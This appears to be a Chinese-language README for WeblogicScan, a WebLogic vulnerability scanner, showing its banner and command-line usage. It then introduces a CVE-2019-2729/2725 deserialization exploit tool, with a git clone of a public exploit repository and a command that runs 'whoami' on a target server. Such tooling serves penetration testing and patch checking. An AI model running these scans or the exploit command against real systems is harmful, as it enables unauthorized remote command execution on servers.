WeblogicScan

Weblogic一键漏洞扫描检测工具

  • 支持Python3
  • 修复漏洞检测误报,漏洞检测结果更精确
  • 添加CVE-2019-2729, CVE-2019-2618漏洞检测
  • 插件化漏洞扫描组件
  • 添加彩色打印
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
__        __   _     _             _        ____
\ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __
\ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
\ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | |
\_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
|___/
By Tide_RabbitMask | V 1.5

Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
usage: WeblogicScan.py [-h] [-u IP] [-p PORT] [-f FILE]

optional arguments:
-h, --help show this help message and exit

Scanner:
-u IP target ip
-p PORT target port
-f FILE target list

---------------------------
kali:
python3 ./weblogicscan.py -u IP -p 7001

CVE-2019-2729-Exploit工具:

1
2
3
4
5
6
7
8
9
10
11
CVE-2019-2729/2725
漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,
用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限

kali:
git clone https://github.com/ruthlezs/CVE-2019-2729-Exploit
python oracle-weblogic-deserialize.py -u http://192.168.43.80:7001 -c whoami
-----------
-h, --help : 显示帮助消息并退出
-u TARGET : 目标 URL
-c COMMAND : 执行命令